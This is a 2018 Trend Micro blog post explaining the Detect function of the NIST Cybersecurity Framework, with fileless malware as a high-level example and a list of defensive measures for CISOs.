• TREND MICRO
  • ABOUT
Search:
  • Latest Posts
  • Categories
    • Android
    • AWS
    • Azure
    • Cloud
    • Compliance
    • Critical Infrastructure
    • Cybercrime
    • Encryption
    • Financial Services
    • Government
    • Hacks
    • Healthcare
    • Internet of Everything
    • Malware
    • Microsoft
    • Mobile Security
    • Network
    • Privacy
    • Ransomware
    • Security
    • Social Media
    • Small Business
    • Targeted Attacks
    • Trend Spotlight
    • Virtualization
    • Vulnerabilities
    • Web Security
    • Zero Day Initiative
    • Industry News
  • Our Experts
    • Ed Cabrera
    • Rik Ferguson
    • Greg Young
    • Mark Nunnikhoven
    • Jon Clay
    • William “Bill” Malik
  • Research
Home   »   Industry News   »   NIST Cybersecurity Framework Series Part 3: Detect

NIST Cybersecurity Framework Series Part 3: Detect

  • Posted on:March 28, 2018
  • Posted in:Industry News, Security
  • Posted by:
    Trend Micro
0
Detect is the third function in NIST's Cybersecurity Framework.

Enterprise chief information security officers have their work cut out for them in the current threat landscape. As attack and infection strategies become more complex and difficult to predict, the business’s CISO must ensure that the organization’s most critical information assets and the systems that support them are secure.

In order to create more cohesive and universal standards of protection, the National Institute of Standards and Technology established its Framework for Improving Critical Infrastructure Cybersecurity. This framework includes five key functions and associated categories for CISOs and their stakeholders to follow.

In the Part 1 and Part 2 of this series, we examined the first function, Identify, as well as the Protect function. Today, we’ll take a closer look at Detect, the third function in the framework, as well as what responsibilities CISOs have according to this step in the NIST Cybersecurity Framework.

Detect: NIST definition

The first two functions of the framework encompass establishing adequate understanding of the current infrastructure as well as the risks that can impact these systems. From here, CISOs should put the necessary protections in place to support the continuous delivery of critical services.

As Compass IT Compliance contributor Geoff Yeagley noted, the Identify function can be thought of as the foundation, with the Protect function serving as the framing.

“Once you have your house built, you need to put some items in your house to alert you to any pending danger or threats,” Yeagley wrote. “These could be things like smoke detectors, carbon monoxide detectors and home alarm systems. Using that same analogy of building a house this would be the Detect function of the core.”

NIST defines the Detect function as the development and implementation of activities “to identify the occurrence of a cybersecurity event,” with a focus on supporting the timely discovery of such events.

Categories under Detect

As many experts including Yeagley note, this function is relatively straightforward. While this surely does not make it any less important than the other functions of the framework, this function does include fewer associated categories. Let’s take a look:

  • Anomalies and events: CISOs and their teams should be able to detect activity considered anomalous. This activity is or could be associated with a cybersecurity incident, and should be detected in a timely manner. CISOs must also strive to understand the potential impact of this aberrant activity, and establish incident alert thresholds.
  • Continuous monitoring: This function also calls for end-to-end monitoring of IT systems and assets in order to pinpoint security issues and gauge the ability of safeguards put in place as part of the Protect function. The network, physical environments, user and service provider activity should all be monitored, and vulnerability scans are performed on protected systems.
  • Detection processes: Here, CISOs and their stakeholders work to maintain all processes and procedures related to the detection of anomalous activity and protections against cybersecurity events. This includes defining roles and responsibilities involved in detection, and also ensuring that these activities align with industry compliance needs and are fully tested and continually improved.

It’s important to keep in mind that it’s not only about detecting the type of suspicious activity that could point to an infection or attack, but also doing so in a timely manner. Currently, hackers are able to fly under the radar for over 100 days before being detected, with some events lasting over 400 days. This gives attackers plenty of time to infect siloed areas of the business and make off with stolen data assets. In this way, it’s imperative that CISOs give the Detect function, and its focus on timeliness, the appropriate attention and effort.

Detection in the real world: Fileless malware

In today’s threat environment, the ability to quickly detect suspicious activity is absolutely key. A recent example that shows this critical importance comes in the form of fileless malware, which has been put to work in ransomware and a range of other types of attacks.

Trend Micro reported on fileless malware in 2017, explaining that similar to other attacks, fileless malware looks to take advantage of system vulnerabilities, but is created with another expressed purpose: to operate in the background and be undetectable to system security measures. In this way, hackers are able to draw out the length of the attack, and potentially breach and steal increasingly sensitive platforms and data assets.

“Current security solutions detect an intrusion based on a malware file’s signature characteristics,” Trend Micro stated in its Simply Security blog. “However, because fileless malware doesn’t have a payload file to infect a system, security applications don’t know what to look for. In addition, this threat uses a system’s own commands to execute the attack, which might not be considered in traffic and behavior monitoring efforts.”

One of the most notable campaigns leveraging fileless malware impacted more than 100 banks and financial service providers across the globe – in one instance, the infection was only discovered when a bank’s security team investigated the physical memory of their Microsoft domain controller. In addition to internal banking systems, hackers also unleashed the fileless malware attack on eight Russian ATMs, allowing attackers to take control of the machines’ capabilities and steal more than $800,000.

Detection lessons of fileless malware

One of the biggest lessons taught by fileless malware is that it no longer takes written or downloaded malicious files forcing execution of a payload within infected local disks – attackers can instead target system memory or registry, injecting the payload there or running scripts within a whitelisted application to enable an attack. In instances of the latter, hackers utilize the legitimacy of tools like PowerShell within the .NET framework because of its scope, accessibility and ability to virtually access different APIs.

CISOs: Leverage a proactive Detect strategy

While difficult, it isn’t impossible to guard against advanced threats like fileless malware – it does, however, require a proactive approach that can be used alongside and aligned with the standards of the Detect function. As Trend Micro Researcher Marvin Cruz noted, proactive security should include measures like:

  • A robust patch strategy that works to ensure all critical systems and applications are up to date.
  • User-based privileges that help reduce risk exposure.
  • Advanced behavior monitoring that can assist in pinpointing anomalous activity.
  • Robust security for all points of entry.
  • Elimination and disabling of unnecessary or unused components and tools.
  • Proactive system- and network-wide monitoring.

“We are in a global cyber arms race,” said Ed Cabrera, Trend Micro Chief Cybersecurity Officer. “The explosive growth of criminal innovation and automation requires an in kind response from CISOs and their teams. Speeding up quality detection through a layered connected threat defense is paramount.”

Through the intelligent identification of risks, implementation of security measures to ensure critical functions and timely detection of threats, enterprises can considerably improve protections of their most critical IT assets. But efforts shouldn’t stop here – check in later for the next parts of our series, where we’ll discuss the Respond and Recover functions.

Click here to read Part 1.

Part 2

Part 3

Part 4

Part 5

Related posts:

  1. NIST Cybersecurity Framework Series Part 1: Identify
  2. NIST Cybersecurity Framework Series Part 2: Protect
  3. NIST Cybersecurity Framework Series Part 4: Respond
  4. NIST Cybersecurity Framework Series Part 5: Recover

Security Intelligence Blog

  • Our New Blog
  • How Unsecure gRPC Implementations Can Compromise APIs, Applications
  • XCSSET Mac Malware: Infects Xcode Projects, Performs UXSS Attack on Safari, Other Browsers, Leverages Zero-day Exploits

Featured Authors

Ed Cabrera (Chief Cybersecurity Officer)
Ed Cabrera (Chief Cybersecurity Officer)
  • Ransomware is Still a Blight on Business
Greg Young (Vice President for Cybersecurity)
Greg Young (Vice President for Cybersecurity)
  • Not Just Good Security Products, But a Good Partner
Jon Clay (Global Threat Communications)
Jon Clay (Global Threat Communications)
  • This Week in Security News: Ransomware Gang is Raking in Tens of Millions of Dollars and Microsoft Patch Tuesday Update Fixes 17 Critical Bugs
Mark Nunnikhoven (Vice President, Cloud Research)
Mark Nunnikhoven (Vice President, Cloud Research)
  • Twitter Hacked in Bitcoin Scam
Rik Ferguson (VP, Security Research)
Rik Ferguson (VP, Security Research)
  • The Sky Has Already Fallen (you just haven’t seen the alert yet)
William
William "Bill" Malik (CISA VP Infrastructure Strategies)
  • Black Hat Trip Report – Trend Micro

Follow Us

Trend Micro In The News

  • Cloud-based Email Threats Capitalized on Chaos of COVID-19
  • Detected Cyber Threats Rose 20% to Exceed 62.6 Billion in 2020
  • Trend Micro Recognized on CRN Security 100 List
  • Trend Micro Reports Solid Results for Q4 and Fiscal Year 2020
  • Connected Cars Technology Vulnerable to Cyber Attacks
  • Home and Home Office
  • |
  • For Business
  • |
  • Security Intelligence
  • |
  • About Trend Micro
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • Privacy Statement
  • Legal Policies
  • Copyright © 2017 Trend Micro Incorporated. All rights reserved.